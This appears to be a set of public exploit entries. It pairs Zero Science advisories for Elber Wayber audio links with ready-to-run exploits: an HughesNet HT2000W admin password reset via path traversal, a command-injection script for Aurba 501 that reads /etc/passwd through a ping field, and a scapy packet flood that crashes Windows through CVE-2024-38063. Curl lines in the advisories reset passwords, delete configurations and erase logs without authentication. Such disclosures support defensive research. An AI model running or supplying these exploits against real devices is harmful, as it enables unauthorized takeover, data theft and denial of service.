Elber Wayber Analog/Digital Audio STL 4.00 Authentication Bypass Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501) Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516) Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516) Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501) Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350) Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342) Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131) Summary: Wayber II is the name of an analogue/digital microwave link able to transport a Mono or a MPX stereo signal from studio to audio transmitter. Compact and reliable, it features very high quality and modern technology both in signal processing and microwave section leading to outstanding performances. Desc: The device suffers from an authentication bypass vulnerability through a direct and unauthorized access to the password management functionality. The issue allows attackers to bypass authentication by manipulating the set_pwd endpoint that enables them to overwrite the password of any user within the system. This grants unauthorized and administrative access to protected areas of the application compromising the device's system security. -------------------------------------------------------------------------- /modules/pwd.html ------------------ 50: function apply_pwd(level, pwd) 51: { 52: $.get("json_data/set_pwd", {lev:level, pass:pwd}, 53: function(data){ 54: //$.alert({title:'Operation',text:data}); 55: show_message(data); 56: }).fail(function(error){ 57: show_message('Error ' + error.status, 'error'); 58: }); 59: } -------------------------------------------------------------------------- Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5822 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5822.php 18.08.2023 -- $ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234 Ref (lev param): Level 7 = SNMP Write Community (snmp_write_pwd) Level 6 = SNMP Read Community (snmp_read_pwd) Level 5 = Custom Password? hidden. (custom_pwd) Level 4 = Display Password (display_pwd)? Level 2 = Administrator Password (admin_pwd) Level 1 = Super User Password (puser_pwd) Level 0 = User Password (user_pwd)

# Exploit Title: HughesNet HT2000W Satellite Modem (Arcadyan httpd 1.0) - Password Reset # Date: 7/16/24 # Exploit Author: Simon Greenblatt <simongreenblatt[at]protonmail.com> # Vendor: HughesNet # Version: Arcadyan httpd 1.0 # Tested on: Linux # CVE: CVE-2021-20090 import sys import requests import re import base64 import hashlib import urllib red = "\033[0;41m" green = "\033[1;34;42m" reset = "\033[0m" def print_banner(): print(green + ''' _____________ _______________ _______________ ________ ____ _______________ _______ _______________ \_ ___ \ \ / /\_ _____/ \_____ \ _ \ \_____ \/_ | \_____ \ _ \ \ _ \/ __ \ _ \ / \ \/\ Y / | __)_ ______ / ____/ /_\ \ / ____/ | | ______ / ____/ /_\ \/ /_\ \____ / /_\ \ \ \____\ / | \ /_____/ / \ \_/ \/ \ | | /_____/ / \ \_/ \ \_/ \ / /\ \_/ \ \______ / \___/ /_______ / \_______ \_____ /\_______ \|___| \_______ \_____ /\_____ //____/ \_____ / \/ \/ \/ \/ \/ \/ \/ \/ \/ \n''' + reset) print(" Administrator password reset for HughesNet HT2000W Satellite Modem") print(''' Usage: python3 hughes_ht2000w_pass_reset.py <password> <ip_address> <password>: The new administrator password <ip_address>: The IP address of the web portal. If none is provided, the script will default to 192.168.42.1\n This script takes advantage of CVE-2021-20090, a path traversal vulnerability in the HTTP daemon of the HT2000W modem to reset the administrator password of the configuration portal. It also takes advantage of other vulnerabilities in the device such as improper use of httokens for authentication and the portal allowing the MD5 hash of the password to be leaked.''') return None def get_httoken(ip_address): # Make a GET request to system_p.htm using path traversal r = requests.get(f'http://{ip_address}/images/..%2fsystem_p.htm') if r.status_code != 200: print(red + f"(-) Failure: Could not request system_p.htm" + reset) exit() # Extract the httoken hidden in the DOM and convert it from Base64 return base64.b64decode(re.search(r'AAAIBRAA7(.*?)"', r.text).group(1)).decode('ascii') def encode_pass(password): # Vigenere Cipher key = "wg7005d" enc_pass = "" idx = 0 for c in password: enc_pass += str(ord(c) + ord(key[idx])) + "+" idx = (idx + 1) % len(key) return enc_pass def change_pass(ip_address, httoken, enc_pass): # Create a POST request with the httoken and the encoded password headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': f'http://{ip_address}/system_p.htm'} payload = {'action': 'ui_system_p', 'httoken': httoken, 'submit_button': 'system_p.htm', 'ARC_SYS_Password': enc_pass} payload = urllib.parse.urlencode(payload, safe=':+') try: r = requests.post(f'http://{ip_address}/images/..%2fapply_abstract.cgi', data = payload, headers = headers) except: pass return None def verify_pass(ip_address, new_pass): # Make a GET request to cgi_sys_p.js to verify password httoken = get_httoken(ip_address) headers = {'Referer': f'http://{ip_address}/system_p.htm'} r = requests.get(f'http://{ip_address}/images/..%2fcgi/cgi_sys_p.js?_tn={httoken}', headers = headers) if r.text.split('"')[5] != hashlib.md5(bytes(new_pass, 'ascii')).hexdigest(): print(red + "(-) Failure: Could not verify the hash of the password" + reset) exit() def main(): if not (len(sys.argv) == 2 or len(sys.argv) == 3): print_banner() return new_pass = sys.argv[1] ip_address = "192.168.42.1" if sys.argv == 3: ip_address = sys.argv[2] httoken = get_httoken(ip_address) print(f"[+] Obtained httoken: {httoken}") enc_pass = encode_pass(new_pass) change_pass(ip_address, httoken, enc_pass) print(f"[+] Password reset to: {new_pass}") verify_pass(ip_address, new_pass) print("[+] Verified password hash: " + hashlib.md5(bytes(new_pass, 'ascii')).hexdigest()) print("[+] Password successfully changed!") return if __name__ == '__main__': main()

Elber Wayber Analog/Digital Audio STL 4.00 Device Config Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501) Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516) Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516) Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501) Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350) Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342) Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131) Summary: Wayber II is the name of an analogue/digital microwave link able to transport a Mono or a MPX stereo signal from studio to audio transmitter. Compact and reliable, it features very high quality and modern technology both in signal processing and microwave section leading to outstanding performances. Desc: The device suffers from an unauthenticated device configuration and client-side hidden functionality disclosure. Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5823 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5823.php 18.08.2023 -- # Config fan $ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp=' Configuration applied # Delete config $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2' File delete successfully # Launch upgrade $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1' Upgrade launched Successfully # Log erase $ curl 'http://TARGET/json_data/erase_log.js?until=-2' Logs erased # Until: # =0 ALL # =-2 Yesterday # =-8 Last week # =-15 Last two weeks # =-22 Last three weeks # =-31 Last month # Set RX config $ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0' RX Config Applied Successfully # Show factory window and FPGA upload (Console) > cleber_show_factory_wnd() # Etc.

# Exploit Title: Remote Command Execution | Aurba 501 # Date: 17-07-2024 # Exploit Author: Hosein Vita # Vendor Homepage: https://www.hpe.com # Version: Aurba 501 CN12G5W0XX # Tested on: Linux import requests from requests.auth import HTTPBasicAuth def get_input(prompt, default_value): user_input = input(prompt) return user_input if user_input else default_value base_url = input("Enter the base URL: ") if not base_url: print("Base URL is required.") exit(1) username = get_input("Enter the username (default: admin): ", "admin") password = get_input("Enter the password (default: admin): ", "admin") login_url = f"{base_url}/login.cgi" login_payload = { "username": username, "password": password, "login": "Login" } login_headers = { "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/x-www-form-urlencoded", "Origin": base_url, "Connection": "close" } session = requests.Session() requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) # Login to the system response = session.post(login_url, headers=login_headers, data=login_payload, verify=False) # Check if login was successful if response.status_code == 200 and "login failed" not in response.text.lower(): print("Login successful!") # The command to be executed on the device command = "cat /etc/passwd" ping_ip = f"4.2.2.4||{command}" # Data to be sent in the POST request data = { "ping_ip": ping_ip, "ping_timeout": "1", "textareai": "", "ping_start": "Ping" } # Headers to be sent with the request headers = { "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/x-www-form-urlencoded", "Origin": base_url, "Referer": f"{base_url}/admin.cgi?action=ping", "Connection": "close" } # Sending the HTTP POST request to exploit the vulnerability exploit_url = f"{base_url}/admin.cgi?action=ping" response = session.post(exploit_url, headers=headers, data=data, verify=False) if any("root" in value for value in response.headers.values()): print("Exploit successful! The /etc/passwd file contents are reflected in the headers:") print(response.headers) else: print("Exploit failed. The response headers did not contain the expected output.") else: print("Login failed. Please check the credentials and try again.") # Print the response headers for further analysis print(response.headers)

#!/usr/bin/env python3 # -*- coding: utf-8 -*- # Exploit Title: Windows IPv6 CVE-2024-38063 Checker and Denial-Of-Service # Date: 2024-08-07 # Exploit Author: Photubias # Vendor Homepage: https://microsoft.com # Vendor Advisory: [1] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063 # Version: Windows 10, 11 <10.0.26100.1457 and Server 2016-2019-2022 <10.0.17763.6189 # Tested on: Windows 11 23H2 and Windows Server 2022 # CVE: CVE-2024-38063 import os, subprocess, re, time, sys ## Variables sDstIP = 'fe80::78b7:6283:49ad:c565' ## Placeholder if len(sys.argv) > 1: sDstIP = sys.argv[1] ## Please provide an argument sDstMAC = '00:0C:29:55:E1:C8' ## Not required, will try to get the MAC via Neighbor Discovery iBatches = 20 iCorruptions = 20 ## How many times do we want to corrupt the tcpip.sys memory per batch try: print('--- Loading Scapy, might take some time ...') from scapy.config import conf conf.ipv6_enabled = False import scapy.all as scapy scapy.conf.verb = 0 except: print('Error while loading scapy, please run "pip install scapy"') exit(1) import logging logging.getLogger('scapy.runtime').setLevel(logging.ERROR) def selectInterface(): #adapter[] = npfdevice, ip, mac def getAllInterfaces(): lstInterfaces=[] if os.name == 'nt': proc = subprocess.Popen('getmac /NH /V /FO csv | FINDSTR /V /I disconnected', shell=True, stdout=subprocess.PIPE) for bInterface in proc.stdout.readlines(): lstInt = bInterface.split(b',') sAdapter = lstInt[0].strip(b'"').decode() sDevicename = lstInt[1].strip(b'"').decode() sMAC = lstInt[2].strip(b'"').decode().lower().replace('-', ':') sWinguID = lstInt[3].strip().strip(b'"').decode()[-38:] proc = subprocess.Popen('netsh int ipv6 show addr "{}" | FINDSTR /I Address'.format(sAdapter), shell=True, stdout=subprocess.PIPE) try: sIP = re.findall(r'[\w:]+:+[\w:]+', proc.stdout.readlines()[0].strip().decode())[0] except: sIP = '' if len(sMAC) == 17: lstInterfaces.append([sAdapter, sIP, sMAC, sDevicename, sWinguID]) # When no or bad MAC address (e.g. PPP adapter), do not add else: proc = subprocess.Popen('for i in $(ip address | grep -v "lo" | grep "default" | cut -d":" -f2 | cut -d" " -f2);do echo $i $(ip address show dev $i | grep "inet6 " | cut -d" " -f6 | cut -d"/" -f1) $(ip address show dev $i | grep "ether" | cut -d" " -f6);done', shell=True, stdout=subprocess.PIPE) for bInterface in proc.stdout.readlines(): lstInt = bInterface.strip().split(b' ') try: if len(lstInt[2]) == 17: lstInterfaces.append([lstInt[0].decode(), lstInt[1].decode(), lstInt[2].decode(), '', '']) except: pass return lstInterfaces lstInterfaces = getAllInterfaces() if len(lstInterfaces) > 1: i = 1 for lstInt in lstInterfaces: #array of arrays: adapter, ip, mac, windows devicename, windows guID print('[{}] {} has {} ({})'.format(i, lstInt[2], lstInt[1], lstInt[0])) i += 1 #sAnswer = input('[?] Please select the adapter [1]: ') sAnswer='3' else: sAnswer = None if not sAnswer or sAnswer == '' or not sAnswer.isdigit() or int(sAnswer) >= i: sAnswer = 1 iAnswer = int(sAnswer) - 1 sNPF = lstInterfaces[iAnswer][0] sIP = lstInterfaces[iAnswer][1] sMAC = lstInterfaces[iAnswer][2] if os.name == 'nt': sNPF = r'\Device\NPF_' + lstInterfaces[iAnswer][4] return (sNPF, sIP, sMAC, lstInterfaces[iAnswer][3]) def get_packets(iID, sDstIPv6, sDstMac=None): iFragID = 0xbedead00 + iID oPacket1 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrDestOpt(options=[scapy.PadN(otype=0x81, optdata='bad')]) oPacket2 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m = 1, offset = 0) / 'notalive' oPacket3 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m = 0, offset = 1) if sDstMac: ## Should always be this, it seems sending to 'ff:ff:ff:ff:ff:ff' does not work oPacket1 = scapy.Ether(dst=sDstMac) / oPacket1 oPacket2 = scapy.Ether(dst=sDstMac) / oPacket2 oPacket3 = scapy.Ether(dst=sDstMac) / oPacket3 return [oPacket1, oPacket2, oPacket3] def doIPv6ND(sDstIP, sInt): ## Try to get a MAC address via IPv6 Neighbour Sollicitation sMACResp = None oNeighborSollicitation = scapy.IPv6(dst=sDstIP) / scapy.ICMPv6ND_NS(tgt=sDstIP) / scapy.ICMPv6NDOptSrcLLAddr(lladdr='ff:ff:ff:ff:ff:ff') oResponse = scapy.sr1(oNeighborSollicitation, timeout=5, iface=sInt) if oResponse and scapy.ICMPv6NDOptDstLLAddr in oResponse: sMACResp = oResponse[scapy.ICMPv6NDOptDstLLAddr].lladdr return sMACResp lstInt = selectInterface() ## NPF, IPv6, MAC, Name sMAC = doIPv6ND(sDstIP, lstInt[0]) if sMAC: print(f'[+] Target {sDstIP} is reachable, got MAC Address {sMAC}') sDstMAC = sMAC elif sDstMAC != '': print('[-] Target not responding to Neighbor Sollicitation Packets, using the provided MAC {}'.format(sDstMAC)) else: print('[-] Without a MAC address, this exploit will probably not work') lstPacketsToSend = [] for i in range(iBatches): for j in range(iCorruptions): lstPacketsToSend += get_packets(j, sDstIP, sDstMAC) + get_packets(j, sDstIP, sDstMAC) ## 'send' is Layer3 (let scapy figure out the MAC address), 'sendp' is L2 (MAC address is filled in, much better) print('[i] Verifying vulnerability against IPv6 address {}'.format(sDstIP)) ## Verification first: "ICMPv6ParamProblem" lstResp = scapy.srp1(lstPacketsToSend[0], iface=lstInt[0], timeout=5) if lstResp and scapy.IPv6 in lstResp[0] and scapy.ICMPv6ParamProblem in lstResp[0]: print('[+] Yes, {} is vulnerable and exploitable for CVE-2024-38063'.format(sDstIP)) else: input('[-] Not vulnerable or firewall is enabled. Please verify and rerun or press enter to continue') print('[i] Waiting 10 seconds to let the target cool down (more is better)') time.sleep(10) input('[?] OK, continue to execute the Denial Of Service (BSOD)? Press Ctrl+C to cancel now') ########## Exploit print('[+] Sending {} packets now via interface {} {}'.format(len(lstPacketsToSend), lstInt[0], lstInt[3])) scapy.conf.verb = 1 scapy.sendp(lstPacketsToSend, iface=lstInt[0]) print('[+] All packets are sent, now it takes *exactly* 60 seconds for the target to crash')